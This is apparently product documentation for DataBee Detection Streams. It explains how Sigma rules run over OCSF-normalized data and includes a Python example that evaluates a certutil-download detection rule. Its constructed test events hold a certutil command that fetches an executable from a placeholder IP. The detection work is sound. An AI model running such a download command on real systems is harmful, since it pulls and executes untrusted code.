What are Detection Streams in DataBee?
Active detection streams apply Sigma rules, an open-source signature format, over security data that has been mapped to a DataBee-extended version of OCSF, so that detections integrate into the existing security ecosystem with minimal customization. DataBee handles the translation from the Sigma field taxonomy to OCSF field names, which lowers the effort needed to adopt Sigma and supports organizations on their journey to vendor-agnostic security operations. Because the detection content is written against OCSF rather than a vendor's native schema, organizations can swap out security vendors without updating log parsers or detection content. In practice a rule is only as good as the field mapping behind it: a Sigma field that has no OCSF counterpart in the mapping will never match, so verify coverage of the fields your rules rely on when onboarding a new source.
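As an added illustration of the Sigma-to-OCSF translation described above (example code written for this page, not DataBee's or SigmaHQ's own), the script below applies a constructed Sigma process-creation rule to constructed OCSF Process Activity events from two different sources. The Sigma-to-OCSF field map, the rule, and the events are all assumptions made for the example; the OCSF field paths follow the public schema's Process Activity class, but DataBee's own extended mapping is not shown on this page.

```python
"""Minimal Sigma-over-OCSF rule evaluator (added illustration, not DataBee code)."""
from typing import Any

# Assumed mapping from Sigma's generic process_creation taxonomy to OCSF
# Process Activity field paths. DataBee's actual mapping is not shown on this
# page, so these field names are an illustrative assumption.
SIGMA_TO_OCSF = {
    "Image": "process.file.path",
    "CommandLine": "process.cmd_line",
    "ParentImage": "process.parent_process.file.path",
    "User": "actor.user.name",
}

# Constructed example rule in Sigma's taxonomy. Equivalent YAML detection block:
#   selection:
#     Image|endswith: '\certutil.exe'
#     CommandLine|contains|all: ['-urlcache', 'http']
#   filter:
#     ParentImage|endswith: '\ConfigMgr.exe'
#   condition: selection and not filter
RULE = {
    "title": "Certutil download (constructed example)",
    "level": "high",
    "detection": {
        "selection": {"Image|endswith": "\\certutil.exe",
                      "CommandLine|contains|all": ["-urlcache", "http"]},
        "filter": {"ParentImage|endswith": "\\ConfigMgr.exe"},
        "condition": "selection and not filter",
    },
}


def get_path(event: dict, dotted: str) -> Any:
    """Walk a dotted OCSF path such as 'process.file.path' through nested dicts."""
    cur: Any = event
    for part in dotted.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur


def match_value(actual: Any, expected: Any, modifiers: list) -> bool:
    """Apply Sigma value modifiers; Sigma string matching is case-insensitive."""
    if actual is None:
        return False
    a, e = str(actual).lower(), str(expected).lower()
    if "contains" in modifiers:
        return e in a
    if "startswith" in modifiers:
        return a.startswith(e)
    if "endswith" in modifiers:
        return a.endswith(e)
    return a == e


def match_field(event: dict, sigma_key: str, expected: Any) -> bool:
    """Translate one 'Field|mod|mod' key to OCSF and match it. A list of values
    is OR-ed by default and AND-ed when the 'all' modifier is present."""
    field, *modifiers = sigma_key.split("|")
    actual = get_path(event, SIGMA_TO_OCSF.get(field, field))
    values = expected if isinstance(expected, list) else [expected]
    combine = all if "all" in modifiers else any
    return combine(match_value(actual, v, modifiers) for v in values)


def match_selection(event: dict, selection: dict) -> bool:
    """Every field in one selection map must match (implicit AND)."""
    return all(match_field(event, k, v) for k, v in selection.items())


def eval_condition(condition: str, results: dict) -> bool:
    """Evaluate e.g. 'selection and not filter' over per-selection results;
    supports and/or/not and parentheses via a tiny recursive-descent parser."""
    tokens = condition.replace("(", " ( ").replace(")", " ) ").split()
    pos = 0

    def parse_or() -> bool:
        nonlocal pos
        v = parse_and()
        while pos < len(tokens) and tokens[pos] == "or":
            pos += 1
            v = parse_and() or v       # parse first so tokens are always consumed
        return v

    def parse_and() -> bool:
        nonlocal pos
        v = parse_not()
        while pos < len(tokens) and tokens[pos] == "and":
            pos += 1
            v = parse_not() and v
        return v

    def parse_not() -> bool:
        nonlocal pos
        tok = tokens[pos]
        pos += 1
        if tok == "not":
            return not parse_not()
        if tok == "(":
            v = parse_or()
            pos += 1                   # consume ')'
            return v
        return results[tok]

    return parse_or()


def run_rule(rule: dict, events: list) -> list:
    """Return the OCSF events that satisfy the rule's condition."""
    det = rule["detection"]
    named = {k: v for k, v in det.items() if k != "condition"}
    return [ev for ev in events if eval_condition(
        det["condition"], {n: match_selection(ev, s) for n, s in named.items()})]


def proc_event(uid, product, path, cmd, parent) -> dict:
    """Build a constructed OCSF Process Activity event (class_uid 1007)."""
    return {"metadata": {"uid": uid, "product": {"name": product}},
            "class_uid": 1007, "activity_id": 1,
            "actor": {"user": {"name": "alice"}},
            "process": {"file": {"path": path}, "cmd_line": cmd,
                        "parent_process": {"file": {"path": parent}}}}


# Constructed sample data: two log sources, both already normalized to OCSF.
EVENTS = [
    proc_event("evt-1", "sensor-A", r"C:\Windows\System32\certutil.exe",
               "certutil -urlcache -split -f http://198.51.100.7/a.exe a.exe",
               r"C:\Windows\System32\cmd.exe"),                      # hit
    proc_event("evt-2", "sensor-B", r"C:\Windows\System32\CERTUTIL.EXE",
               "CERTUTIL.EXE -urlcache -f http://198.51.100.7/b.exe b.exe",
               r"C:\Program Files\ConfigMgr.exe"),                    # excluded by filter
    proc_event("evt-3", "sensor-B", r"C:\Windows\System32\certutil.exe",
               "certutil -hashfile a.exe SHA256", r"C:\Windows\System32\cmd.exe"),  # no -urlcache
    proc_event("evt-4", "sensor-A", r"C:\Windows\System32\cmd.exe",
               "cmd /c certutil -urlcache http", r"C:\Windows\explorer.exe"),       # wrong Image
]


def matching_uids(rule: dict = RULE, events: list = EVENTS) -> list:
    return [ev["metadata"]["uid"] for ev in run_rule(rule, events)]


if __name__ == "__main__":
    print(matching_uids())   # ['evt-1']
```

The rule never references a vendor field name: both sensor-A and sensor-B events are matched through the same OCSF paths, which is the property that lets detection content survive a source swap. Note also that the `filter` selection only works because `ParentImage` has an entry in the map; delete that entry and the filter silently stops excluding evt-2, which is the mapping-coverage caveat above in miniature.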
Sigma rules provide a standardized syntax for defining detection logic, letting security professionals express the conditions that identify a potential security incident. They cover a wide range of threat indicators, from known attack patterns to emerging techniques, and because the format is open source, rules are freely shared among security operators. The primary aim of Sigma is to streamline threat detection and incident response: by offering a common language for detection logic, it bridges the gap between disparate security technologies.
To learn more about Sigma rules, visit the official Sigma GitHub repository: sigma rules
Within DataBee, you can extend your security monitoring by writing custom Sigma rules or by linking to existing Sigma rule Git repositories. Many public Sigma rule repositories are available; some are highlighted below for convenience:
View Detection Streams
Click the Detection Streams button to view a table of all results matching the configured Sigma rulesets. By default, the view is filtered to Sigma-formatted detections.
To narrow the results, the DataBee platform offers Smart Filters:
- Title: click the 'Title' dropdown and either enter keywords under the 'Contains' option or pick the specific titles to include.
- Parameter dropdowns: use the 'In' or 'Not In' options for a more targeted result set.
- Level: select the desired severity (Informational, Low, Medium, High, Critical).
- Status: choose specific status tags to streamline your search.
- Time: restrict the event time to the last hour, day, week, or month, or set a custom range for when the events occurred.
- Additional parameters: add further filter parameters from the Add Parameters dropdown list.
Click on Apply to activate the selected filters.
After you apply the filters, the table is regenerated with the matching results. To see the details of a specific result, click the search icon in the 'Details' column; a "Rules Details" page opens showing the full rule text with YAML syntax highlighting. Use the pagination dropdown to set the number of results shown per page.